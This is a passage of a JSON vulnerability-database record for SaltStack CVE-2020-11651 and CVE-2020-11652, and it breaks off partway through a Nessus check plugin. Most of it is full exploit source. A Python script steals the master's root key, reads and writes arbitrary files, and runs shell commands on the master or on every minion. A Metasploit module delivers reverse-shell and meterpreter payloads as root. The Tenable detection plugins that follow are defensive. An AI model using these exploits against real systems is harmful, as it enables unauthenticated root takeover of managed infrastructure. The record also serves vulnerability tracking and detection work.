"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-08-31T07:08:45", "description": "", "published": "2020-05-05T00:00:00", "type": "packetstorm", "title": "Saltstack 3000.1 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "PACKETSTORM:157560", "href": "https://packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Saltstack 3000.1 - Remote Code Execution \n# Date: 2020-05-04 \n# Exploit Author: Jasper Lievisse Adriaanse \n# Vendor Homepage: https://www.saltstack.com/ \n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* \n# Tested on: Debian 10 with Salt 2019.2.0 \n# CVE : CVE-2020-11651 and CVE-2020-11652 \n# Discription: Saltstack authentication bypass/remote code execution \n# \n# Source: https://github.com/jasperla/CVE-2020-11651-poc \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \n#!/usr/bin/env python \n# \n# Exploit for CVE-2020-11651 and CVE-2020-11652 \n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \nfrom __future__ import absolute_import, print_function, unicode_literals \nimport argparse \nimport datetime \nimport os \nimport os.path \nimport sys \nimport time \n \nimport salt \nimport salt.version \nimport salt.transport.client \nimport salt.exceptions \n \ndef init_minion(master_ip, master_port): \nminion_config = { \n'transport': 'zeromq', \n'pki_dir': '/tmp', \n'id': 'root', \n'log_level': 'debug', \n'master_ip': master_ip, \n'master_port': master_port, \n'auth_timeout': 5, \n'auth_tries': 1, \n'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) \n} \n \nreturn salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') \n \n# --- check funcs ---- \n \ndef check_salt_version(): \nprint(\"[+] Salt version: {}\".format(salt.version.__version__)) \n \nvi = salt.version.__version_info__ \n \nif (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): \nreturn True \nelse: \nreturn False \n \ndef check_connection(master_ip, master_port, channel): \nprint(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='') \nsys.stdout.flush() \n \n# connection check \ntry: \nchannel.send({'cmd':'ping'}, timeout=2) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"OFFLINE\") \nsys.exit(1) \nelse: \nprint(\"ONLINE\") \n \ndef check_CVE_2020_11651(channel): \nprint(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='') \nsys.stdout.flush() \n# try to evil \ntry: \nrets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \npass \nfinally: \nif rets: \nroot_key = rets[2]['root'] \nreturn root_key \n \nreturn None \n \ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'cmd': 'get_token', \n'arg': [], \n'token': top_secret_file_path, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nprint(\"NO\") \n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': top_secret_file_path, \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return']: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write1(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'path': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'data': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \n \npp(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write2(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'config.update_config', \n'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'yaml_contents': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652.conf') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef pwn_read_file(channel, root_key, path, master_ip): \nprint(\"[+] Attemping to read {} from {}\".format(path, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': path, \n'saltenv': 'base', \n} \n \nrets = channel.send(msg, timeout=3) \nprint(rets['data']['return'][0][path]) \n \ndef pwn_upload_file(channel, root_key, src, dest, master_ip): \nprint(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip)) \nsys.stdout.flush() \n \ntry: \nfh = open(src, 'rb') \npayload = fh.read() \nfh.close() \nexcept Exception as e: \nprint('[-] Failed to read {}: {}'.format(src, e)) \nreturn \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'saltenv': 'base', \n'data': payload, \n'path': dest, \n} \n \nrets = channel.send(msg, timeout=3) \nprint('[ ] {}'.format(rets['data']['return'])) \n \ndef pwn_exec(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'runner', \n'fun': 'salt.cmd', \n'saltenv': 'base', \n'user': 'sudo_user', \n'kwarg': { \n'fun': 'cmd.exec_code', \n'lang': 'python', \n'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd) \n}, \n'jid': jid, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \n \nif rets.get('jid'): \nprint('[+] Successfully scheduled job: {}'.format(rets['jid'])) \n \ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': '_send_pub', \n'fun': 'cmd.run', \n'user': 'root', \n'arg': [ \"/bin/sh -c '{}'\".format(cmd) ], \n'tgt': '*', \n'tgt_type': 'glob', \n'ret': '', \n'jid': jid \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \nfinally: \nif rets == None: \nprint('[+] Successfully submitted job to all minions.') \nelse: \nprint('[-] Failed to submit job') \n \n \ndef main(): \nparser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') \nparser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') \nparser.add_argument('--port', '-p', dest='master_port', default='4506') \nparser.add_argument('--force', '-f', dest='force', default=False, action='store_false') \nparser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') \nparser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') \nparser.add_argument('--read', '-r', dest='read_file') \nparser.add_argument('--upload-src', dest='upload_src') \nparser.add_argument('--upload-dest', dest='upload_dest') \nparser.add_argument('--exec', dest='exec', help='Run a command on the master') \nparser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') \nargs = parser.parse_args() \n \nprint(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\") \ntime.sleep(1) \n \n# Both src and destination are required for uploads \nif (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): \nprint('[-] Must provide both --upload-src and --upload-dest') \nsys.exit(1) \n \nchannel = init_minion(args.master_ip, args.master_port) \n \nif check_salt_version(): \nprint(\"[ ] This version of salt is vulnerable! Check results below\") \nelif args.force: \nprint(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\") \nelse: \nsys.exit() \n \ncheck_connection(args.master_ip, args.master_port, channel) \n \nroot_key = check_CVE_2020_11651(channel) \nif root_key: \nprint('\\n[*] root key obtained: {}'.format(root_key)) \nelse: \nprint('[-] Failed to find root key...aborting') \nsys.exit(127) \n \nif args.run_checks: \n# Assuming this check runs on the master itself, create a file with \"secret\" content \n# and abuse CVE-2020-11652 to read it. \ntop_secret_file_path = '/tmp/salt_cve_teta' \nwith salt.utils.fopen(top_secret_file_path, 'w') as fd: \nfd.write(\"top secret\") \n \n# Again, this assumes we're running this check on the master itself \nwith salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: \nroot_key = keyfd.read() \n \ncheck_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) \ncheck_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) \ncheck_CVE_2020_11652_write1(debug, channel, root_key) \ncheck_CVE_2020_11652_write2(debug, channel, root_key) \nos.remove(top_secret_file_path) \nsys.exit(0) \n \nif args.read_file: \npwn_read_file(channel, root_key, args.read_file, args.master_ip) \n \nif args.upload_src: \nif os.path.isabs(args.upload_dest): \nprint('[-] Destination path must be relative; aborting') \nsys.exit(1) \npwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) \n \n \njid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) \n \nif args.exec: \npwn_exec(channel, root_key, args.exec, args.master_ip, jid) \n \nif args.exec_all: \nprint(\"[!] Lester, is this what you want? Hit ^C to abort.\") \ntime.sleep(2) \npwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157560/saltstack30001-exec.txt"}, {"lastseen": "2020-05-17T09:39:05", "description": "", "published": "2020-05-12T00:00:00", "type": "packetstorm", "title": "SaltStack Salt Master/Minion Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-12T00:00:00", "id": "PACKETSTORM:157678", "href": "https://packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::ZeroMQ \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE', \n'Description' => %q{ \nThis module exploits unauthenticated access to the runner() and \n_send_pub() methods in the SaltStack Salt master's ZeroMQ request \nserver, for versions 2019.2.3 and earlier and 3000.1 and earlier, to \nexecute code as root on either the master or on select minions. \n \nVMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are \nknown to be affected by the Salt vulnerabilities. \n \nTested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as \nwell as Vulhub's Docker image. \n}, \n'Author' => [ \n'F-Secure', # Discovery \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-11651'], # Auth bypass (used by this module) \n['CVE', '2020-11652'], # Authed directory traversals (not used here) \n['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'], \n['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'], \n['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py'] \n], \n'DisclosureDate' => '2020-04-30', # F-Secure advisory \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Master (Python payload)', \n'Description' => 'Executing Python payload on the master', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Master (Unix command)', \n'Description' => 'Executing Unix command on the master', \n'Type' => :unix_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n], \n[ \n'Minions (Python payload)', \n'Description' => 'Executing Python payload on the minions', \n'Type' => :python, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_https' \n} \n], \n[ \n'Minions (Unix command)', \n'Description' => 'Executing Unix command on the minions', \n'Type' => :unix_command, \n'DefaultOptions' => { \n# cmd/unix/reverse_python_ssl crashes in this target \n'PAYLOAD' => 'cmd/unix/reverse_python' \n} \n] \n], \n'DefaultTarget' => 0, # Defaults to master for safety \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key' \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(4506), \nOptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/]) \n]) \n \nregister_advanced_options([ \nOptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10]) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \n# NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key \n \ndef exploit \n# check.reason is from auxiliary/gather/saltstack_salt_root_key \nif target.name.start_with?('Master') \nunless (root_key = check.reason) \nfail_with(Failure::BadConfig, \n\"#{target['Description']} requires a root key\") \nend \n \nprint_good(\"Successfully obtained root key: #{root_key}\") \nend \n \n# These are from Msf::Exploit::Remote::ZeroMQ \nzmq_connect \nzmq_negotiate \n \nprint_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\") \n \ncase target.name \nwhen /^Master/ \nyeet_runner(root_key) \nwhen /^Minions/ \nyeet_send_pub \nend \n \n# HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one \nsleep(wfs_delay) \nrescue EOFError, Rex::ConnectionError => e \nprint_error(\"#{e.class}: #{e.message}\") \nensure \n# This is from Msf::Exploit::Remote::ZeroMQ \nzmq_disconnect \nend \n \ndef yeet_runner(root_key) \nprint_status(\"Yeeting runner() at #{peer}\") \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951 \nrunner = { \n'cmd' => 'runner', \n# https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd \n'fun' => 'salt.cmd', \n'kwarg' => { \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet' \n}, \n'user' => 'root', # This is NOT the Unix user! \n'key' => root_key # No JID needed, only the root key! \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nrunner['kwarg'].merge!( \n'fun' => 'cmd.exec_code', \n'lang' => payload.arch.first, \n'code' => payload.encoded \n) \nwhen :unix_command \n# HTTPS doesn't appear to be supported by the server :( \nprint_status(\"Serving intermediate stager over HTTP: #{start_service}\") \n \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script \nrunner['kwarg'].merge!( \n# cmd.run doesn't work due to a missing argument error, so we use this \n'fun' => 'cmd.script', \n'source' => get_uri, \n'stdin' => payload.encoded \n) \nend \n \nvprint_status(\"Unserialized clear load: #{runner}\") \nzmq_send_message(serialize_clear_load(runner)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive runner() response') \nend \n \nvprint_good(\"Received runner() response: #{res.inspect}\") \nend \n \ndef yeet_send_pub \nprint_status(\"Yeeting _send_pub() at #{peer}\") \n \n# NOTE: A unique JID (job ID) is needed for every published job \njid = generate_jid \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151 \n# https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151 \nsend_pub = { \n'cmd' => '_send_pub', \n'kwargs' => { \n'bg' => true, \n'hide_output' => true, \n'ignore_retcode' => true, \n'output_loglevel' => 'quiet', \n'show_jid' => false, \n'show_timeout' => false \n}, \n'user' => 'root', # This is NOT the Unix user! \n'tgt' => datastore['MINIONS'].source, \n'tgt_type' => 'pcre', \n'jid' => jid \n} \n \ncase target['Type'] \nwhen :python \nvprint_status(\"Executing Python code: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code \nsend_pub.merge!( \n'fun' => 'cmd.exec_code', \n'arg' => [payload.arch.first, payload.encoded] \n) \nwhen :unix_command \nvprint_status(\"Executing Unix command: #{payload.encoded}\") \n \n# https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run \nsend_pub.merge!( \n'fun' => 'cmd.run', \n'arg' => [payload.encoded] \n) \nend \n \nvprint_status(\"Unserialized clear load: #{send_pub}\") \nzmq_send_message(serialize_clear_load(send_pub)) \n \nunless (res = sock.get_once) \nfail_with(Failure::Unknown, 'Did not receive _send_pub() response') \nend \n \nvprint_good(\"Received _send_pub() response: #{res.inspect}\") \n \n# NOTE: This path will likely change between platforms and distros \nregister_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\") \nend \n \n# https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py \n# https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py \ndef generate_jid \nDateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N') \nend \n \n# HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP \ndef stager_instance \nnil \nend \n \n# HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP \ndef exe \n# NOTE: The shebang line is necessary in this case! \n<<~SHELL \n#!/bin/sh \n/bin/sh \nSHELL \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157678/saltstack_salt_unauth_rce.rb.txt"}], "nessus": [{"lastseen": "2021-04-17T03:14:04", "description": "According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to\n2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerabilities exists in the ClearFuncs class due to improper validation of\n method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger\n minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the\n local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerabilities exists in the ClearFuncs class due to improper path sanitization. An\n authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows\n the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)", "edition": 5, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-07T00:00:00", "title": "SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-07T00:00:00", "cpe": ["cpe:/a:saltstack:salt"], "id": "SALTSTACK_3000_2_MULTIPLE_VULNERABILITIES.NASL", "href": "https://www.tenable.com/plugins/nessus/136402", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136402);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/16\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"EDB-ID\", value:\"48421\");\n\n script_name(english:\"SaltStack < 2019.2.4 / 3000.x < 3000.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of SaltStack running on the remote server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of SaltStack hosted on the remote server is prior to\n2019.2.4, 3000.x prior to 3000.2. It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerabilities exists in the ClearFuncs class due to improper validation of\n method calls. An unauthenticated, remote attacker can exploit this by accessing exposed methods to trigger\n minions to run arbitrary commands as root, or to retrieve the root key to authenticate commands from the\n local root user on the master server. (CVE-2020-11651)\n\n - A directory traversal vulnerabilities exists in the ClearFuncs class due to improper path sanitization. An\n authenticated, remote attacker can exploit this by accessing the exposed get_token() method which allows\n the insertion of double periods in the filename parameter to read files outside of the intended directory.\n The only restriction is that the file has to be deserializable by salt.payload.Serial.loads().\n (CVE-2020-11652)\");\n # https://labs.f-secure.com/advisories/saltstack-authorization-bypass\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4df67f57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to SaltStack version 2019.2.4, 3000.2 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:saltstack:salt\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"saltstack_salt_linux_installed.nbin\");\n script_require_keys(\"installed_sw/SaltStack Salt Master\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'SaltStack Salt Master');\n\nvcf::check_all_backporting(app_info:app_info);\n\nconstraints = [\n { 'fixed_version' : '2019.2.0', 'fixed_display' : '2019.2.4, 3000.2 or later.' },\n { 'min_version' : '2019.2.0', 'fixed_version' : '2019.2.4' },\n { 'min_version' : '3000.0', 'fixed_version' : '3000.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T01:12:33", "description": "An update of the salt package has been released.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-18T00:00:00", "title": "Photon OS 1.0: Salt PHSA-2020-1.0-0294", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-18T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0294_SALT.NASL", "href": "https://www.tenable.com/plugins/nessus/136694", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0294. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136694);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"Photon OS 1.0: Salt PHSA-2020-1.0-0294\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-294.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"salt-2019.2.4-1.ph1\")) flag++;\nif 